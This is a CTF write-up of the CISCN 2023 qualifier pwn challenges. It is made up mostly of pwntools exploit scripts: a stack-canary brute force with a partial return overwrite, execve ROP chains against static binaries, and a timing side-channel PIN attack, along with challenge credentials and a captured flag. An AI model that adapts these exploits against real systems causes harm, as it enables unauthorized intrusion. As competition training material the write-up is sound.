CISCN2023初赛复现 — replaying the CISCN 2023 qualifier pwn challenges (funcanary, 烧烤/shaokao, Login, shellwego); the listings below are the exploit scripts used for each one.

funcanary

from pwn import *
import binascii
# pwntools setup for the funcanary exploit: verbose tube logging, Linux target,
# and gdb windows opened in a horizontal tmux split.
context.update(log_level='debug', os='linux', terminal=['tmux', 'splitw', '-h'])
local = 1  # 1 = spawn ./funcanary locally, 0 = connect to the remote instance (see exp())
elf = ELF('./funcanary')
def db():
    """Attach gdb to the current tube `p`, but only when running the local process."""
    if not local:
        return
    gdb.attach(p)


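def build_payload(canary):
    """Build the final overflow for the vulnerable frame.

    Layout: 104 filler bytes up to the canary slot, the 8-byte leaked canary,
    8 bytes over the saved rbp, then only the two low bytes of the return
    address (0x7228 little-endian).  The low 12 bits (0x228) are presumably
    fixed by the binary's page layout (the original noted 0x001228); the high
    nibble of the second byte (7) is a guess at one PIE-randomised nibble, so a
    single attempt succeeds with probability 1/16 and callers must retry with a
    fresh process/connection.

    Raises ValueError if `canary` is not exactly 8 bytes (i.e. the leak failed).
    """
    if len(canary) != 8:
        raise ValueError("canary must be 8 bytes, got %d" % len(canary))
    return b'a' * 104 + canary + b'a' * 8 + b'\x28\x72'


def leak_canary(tube):
    """Brute-force the stack canary one byte at a time against the forking server.

    The lowest byte of a glibc canary is always 0, so only 7 bytes are guessed.
    Each probe sends 104 filler bytes, the bytes already known and one guess.
    A reply containing "fun" means the child survived the canary check (right
    guess); anything else means it aborted and the parent printed the next
    "welcome".  Returns the 8-byte canary, or None when no byte was accepted at
    some position (the tube is then out of sync and the attempt should be
    abandoned).  All I/O is done in bytes — the original mixed str and bytes,
    which raises TypeError on Python 3 and mis-encodes guesses >= 0x80.
    """
    canary = b'\x00'
    for pos in range(7):
        for guess in range(256):
            print("the %d: %d" % (pos, guess))
            tube.send(b'a' * 104 + canary + bytes([guess]))
            reply = tube.recvuntil(b"welcome\n")
            print(reply)
            if b"fun" in reply:
                canary += bytes([guess])
                print("canary: " + canary.hex())
                break
        else:
            return None
    return canary


def exp():
    """Run one full attempt: spawn/connect, leak the canary, fire the payload.

    Returns True when a shell session was opened (the reply contained "flag"),
    False otherwise so the caller can retry.  Uses the module globals `local`
    (target selection) and `p` (the tube, re-created on every call so each
    attempt leaks the canary of its own process).
    """
    global p
    if local:
        p = process('./funcanary')
    else:
        p = remote('47.94.206.10', 13858)
    p.recvuntil(b'welcome\n')

    canary = leak_canary(p)
    if canary is None:
        print("canary leak failed, abandoning this attempt")
        return False
    # Report the canary as the value the register holds (little-endian); the
    # original hexlified the raw byte string, which shows it byte-reversed.
    print(hex(int.from_bytes(canary, 'little')))

    pl = build_payload(canary)
    print(pl)
    p.send(pl)
    reply = p.recv(timeout=0.5)
    print(reply)
    if b'flag' in reply:
        p.interactive()
        return True
    return False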
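if __name__ == '__main__':
    # The 2-byte return-address overwrite guesses one PIE nibble, so keep
    # trying until a shell appears.  Every attempt talks to a fresh target; the
    # previous tube is closed before retrying so the loop does not accumulate
    # dead ./funcanary children (the original never closed them).
    while True:
        try:
            if exp():
                break
        except KeyboardInterrupt:
            break
        except EOFError:
            pass  # target died mid-attempt (wrong guess or desync): just retry
        stale = globals().get('p')
        if stale is not None:
            stale.close()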

烧烤 (shaokao — the `./shaokao` binary)

# -*- coding=utf-8 -*-
#!/usr/bin/env python3
# A script for pwn exp
# 解题思路 (approach): the original note said "format-string leak first, then ROP", but this script performs no leak — the binary is apparently statically linked (gadgets at fixed 0x40xxxx–0x4axxxx addresses, LIBC = 0), so it overflows the name buffer straight into an execve ROP chain.
from pwn import *
import os
import sys

# pwntools environment: Linux target, gdb in a horizontal tmux split.
context.update(os='linux', terminal=['tmux', 'splitw', '-h'])

LOCAL = 0  # overridden below from the command line
LIBC = 0   # 1 = LD_PRELOAD libc_path into the local process
elf_path = './shaokao'
libc_path = './libc.so.61'
code = ELF(elf_path)
context.arch = code.arch  # so p64()/asm() follow the binary (amd64)


# Thin wrappers over the global tube `io` (assigned in __main__) so the exploit
# body stays short.  Same names and semantics as the usual pwntools template.
def r(x):
    return io.recv(x)


def ra():
    return io.recvall()


def rl():
    return io.recvline(keepends=True)


def ru(x):
    return io.recvuntil(x, drop=True)


def s(x):
    return io.send(x)


def sl(x):
    return io.sendline(x)


def sa(x, y):
    return io.sendafter(x, y)


def sla(x, y):
    return io.sendlineafter(x, y)


def ia():
    return io.interactive()


def c():
    return io.close()


def li(x):
    # Orange log line so our own messages stand out from pwntools' debug output.
    return log.info('\x1b[01;38;5;214m' + x + '\x1b[0m')

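# Target selection from the command line:
#   no argument   -> local process, debug logging
#   HOST:PORT     -> remote target, debug logging
#   anything else -> print usage and exit.  (In the original this branch sat
#                    behind `len(sys.argv) < 2` as `== 1` and was unreachable;
#                    a malformed argument crashed on split(':')[1] instead.)
if len(sys.argv) < 2:
    LOCAL = 1
    context.log_level = 'debug'
elif ':' not in sys.argv[1]:
    print("Welcome to c0ke's simplified pwntools template!!!")
    print("Usage : \n")
    print(" python mode.py HOST:PORT\n ")
    exit()
else:
    context.log_level = 'debug'
    server_ip, port_text = sys.argv[1].split(':', 1)
    server_port = int(port_text)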


# --------------------------func-----------------------------
def db():
    """Attach gdb to the tube `io`; a no-op against a remote target."""
    if not LOCAL:
        return
    gdb.attach(io)


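def cat_flag():
    """Run `cat flag` on the spawned shell, print the flag{...} token, and exit.

    The original extracted the flag into a local and then exited without ever
    showing it; it is now logged via li() before exit(0).
    """
    flag_header = b'flag{'
    sleep(1)  # give the shell a moment to start before sending the command
    sl('cat flag')
    ru(flag_header)
    flag = flag_header + ru('}') + b'}'
    li(flag.decode(errors='replace'))
    exit(0)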


# --------------------------exploit--------------------------
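# Gadgets from the (apparently static) ./shaokao binary and the address the
# "name" input is stored at.
#   0x40264f : pop rdi ; ret
#   0x40a67e : pop rsi ; ret
#   0x4a404a : pop rax ; pop rdx ; pop rbx ; ret
#   0x402404 : syscall
POP_RDI = 0x40264f
POP_RSI = 0x40a67e
POP_RAX_RDX_RBX = 0x4a404a
SYSCALL = 0x402404
NAME_ADDR = 0x4e60f0  # presumably the global buffer the name is copied to — confirm in the binary


def build_rop():
    """Return the overflow payload for the "请赐名" (give a name) prompt.

    "/bin/sh\\0" sits at the start of the name buffer (so it lives at NAME_ADDR),
    24 + 8 filler bytes reach the saved return address, then the chain performs
    execve(NAME_ADDR, 0, 0): rdi = NAME_ADDR, rsi = 0, rax = 0x3b, rdx = 0,
    rbx = 0 (scratch from the triple-pop gadget), syscall.

    Everything is bytes — the original started the payload with a str literal,
    which raises TypeError on Python 3.
    """
    import struct

    def q(value):
        return struct.pack('<Q', value)

    chain = [POP_RDI, NAME_ADDR, POP_RSI, 0, POP_RAX_RDX_RBX, 0x3b, 0, 0, SYSCALL]
    return b"/bin/sh\x00" + b"a" * (32 - 8) + b"b" * 8 + b"".join(q(v) for v in chain)


def exploit():
    """Walk the menu to the overflowing name prompt and deliver the ROP chain."""
    li('exploit...')
    se(1)
    sla("3. 勇闯天涯\n", '3')
    # Negative quantity — presumably underflows the balance check so the stall
    # becomes ours (menu 4/5 then reach the rename prompt); confirm in the binary.
    sla("来几瓶?\n", "-100000")
    se(4)
    se(5)
    sla("烧烤摊儿已归你所有,请赐名:\n", build_rop())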




def se(x):
    """Answer the "> " menu prompt with `x` (any value; sent as str(x) + newline)."""
    choice = str(x)
    sla("> ", choice)

def finish():
    """Hand the tube over to the user, then close it when they are done."""
    ia()
    c()


# --------------------------main-----------------------------
if __name__ == '__main__':
    # Open the tube `io` that all the wrappers above use, then run the exploit.
    elf = ELF(elf_path)
    if LOCAL:
        if LIBC:
            libc = ELF(libc_path)
            io = elf.process(env={"LD_PRELOAD": libc_path})
        else:
            io = elf.process()
    else:
        io = remote(server_ip, server_port)
        if LIBC:
            libc = ELF(libc_path)
    exploit()
    finish()

Login

from pwn import *
from sys import argv
# amd64 Linux target with verbose tube logging.
context.update(os='linux', arch='amd64', log_level='debug')
# One-line wrappers over the global tube `p` (created further down).
def s(a): p.send(a)                       # raw send
def sa(a, b): p.sendafter(a, b)           # send b once a has been received
def sl(a): p.sendline(a)                  # send + newline
def sla(a, b): p.sendlineafter(a, b)      # sendline b once a has been received
def r(): p.recv()                         # drain whatever is pending (result discarded)
def pr(): print(p.recv())                 # drain and print
def ru(a): return p.recvuntil(a)          # receive up to and including a
def inter(): p.interactive()              # hand the tube to the user
def debug(): gdb.attach(p); pause()       # attach gdb, then wait for Enter
def get_addr():
    """Read up to the next 0x7f byte and decode the last 6 bytes as a little-endian
    64-bit pointer (the usual shape of a leaked libc/stack address)."""
    leaked = p.recvuntil(b'\x7f')[-6:]
    return u64(leaked.ljust(8, b'\x00'))
def get_sb():
    """Return (system, "/bin/sh") addresses, rebased on the global `libc_base`."""
    system_addr = libc_base + libc.sym['system']
    binsh_addr = libc_base + next(libc.search(b'/bin/sh\x00'))
    return system_addr, binsh_addr


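def probe_pin(candidate):
    """Submit one 8-digit PIN guess through menu option 3 and time the verdict.

    Returns (elapsed_seconds, reply_line).  The clock starts right before the PIN
    is sent and stops when the verdict line arrives, so network jitter is part of
    the measurement — callers should sum several samples.  Uses a monotonic
    clock; the original used time.time(), which can jump.
    """
    ru('>')
    sl(b'3')
    ru(b"PIN code: ")
    start = time.perf_counter()
    sl(candidate)
    reply = ru(b'\n')
    return time.perf_counter() - start, reply


def getpin(pin, digits='0123456789', samples=10, probe=None):
    """Recover the next PIN digit after the known prefix `pin` via a timing side channel.

    For every candidate digit the guess `pin + digit`, right-padded with '0' to
    8 characters, is submitted `samples` times; the digit whose replies took the
    longest in total is returned (presumably the server compares digit by digit
    and bails on the first mismatch, so a longer correct prefix takes longer).
    If a guess is ever accepted outright ("Wrong PIN code" absent) sampling for
    that digit stops early.  With 10 samples and 10 digits that is ~100
    round trips per position; raise `samples` on a noisy link.

    `probe` submits one candidate and returns (seconds, reply); it defaults to
    probe_pin (which talks to the global tube) and is injectable for testing.

    Fixes from the original: `print(cur, sum)` and `print(pin_0)` referenced
    undefined names (NameError), `sum` shadowed the builtin, and the digit
    alphabet came from a module global `a` instead of a parameter.
    """
    if probe is None:
        probe = probe_pin
    best_digit = ''
    best_total = -1.0
    for digit in digits:
        candidate = (pin + digit).ljust(8, '0')
        total = 0.0
        for _ in range(samples):
            elapsed, reply = probe(candidate)
            total += elapsed
            if b"Wrong PIN code" not in reply:
                print(candidate)  # accepted as-is: remaining digits are right too
                break
        print(digit, total)
        if total > best_total:
            best_total = total
            best_digit = digit
    return best_digit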
a = '0123456789'  # digit alphabet consumed by getpin()
p = remote("123.56.238.150", 45118)

# Recover the 8-digit PIN one position at a time: the digit with the slowest
# responses is taken as correct.
pin = ''
for _ in range(8):
    pin += getpin(pin)
print("PIN:", pin)

# Menu option 2 = login; password taken from the write-up.
ru(b'>')
sl(b'2')
ru(b'PASSWD')
sl(b"123456")
ru(b'$')
sl(b"cat flag")
p.interactive()
# flag{d39a1013-e066-4d64-8558-4a5855fb7303}  pin code: 54730891

shellwego


from pwn import *
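# Gadgets in the (apparently statically linked) ./pwn binary — addresses are
# fixed, so no leak stage is needed.
POP_RDI = 0x444fec
POP_RSI = 0x41e818
POP_RDX = 0x49e11d
POP_RAX = 0x40d9e6
SYSCALL = 0x463738               # "able_syscall" in the original notes
SCRATCH = 0x5A2BA0 + 0xa00       # presumably a writable global buffer; "/bin/sh" is read() here — confirm
PADDING = 0x290 - 0x60 + 3 - 0x10  # number of "+ " tokens from the echo argument to the saved rip


def build_rop_chain(scratch=SCRATCH):
    """Return the two-stage ROP chain as raw little-endian qwords.

    Stage 1: read(0, scratch, 0x100) — pulls "/bin/sh\\0" from stdin into memory.
    Stage 2: execve(scratch, 0, 0) with rax = 59.  rsi is zeroed a second time
             right before the syscall, exactly as in the original chain (kept in
             case the pop rax gadget disturbs rsi — not verified here).
    """
    import struct

    def q(value):
        return struct.pack('<Q', value)

    stage1 = [POP_RDI, 0, POP_RSI, scratch, POP_RDX, 0x100, POP_RAX, 0, SYSCALL]
    stage2 = [POP_RDI, scratch, POP_RSI, 0, POP_RDX, 0, POP_RAX, 59,
              POP_RSI, 0, SYSCALL]
    return b"".join(q(v) for v in stage1 + stage2)


def main():
    """Authenticate, overflow via the shell's `echo` argument, then pop a shell."""
    context.log_level = "debug"
    p = process("./pwn")
    # p = remote("node4.anna.nssctf.cn", 28486)

    p.recvuntil("$ ")
    p.sendline("cert nAcDsMicN S33UAga1n@#!")  # challenge credentials that unlock the "# " prompt
    p.recvuntil("# ")

    payload = b"echo " + b"+ " * PADDING + build_rop_chain()
    p.sendline(payload)
    p.sendline("/bin/sh\x00")  # consumed by the stage-1 read(); NUL-terminated for execve
    p.interactive()


if __name__ == "__main__":
    main()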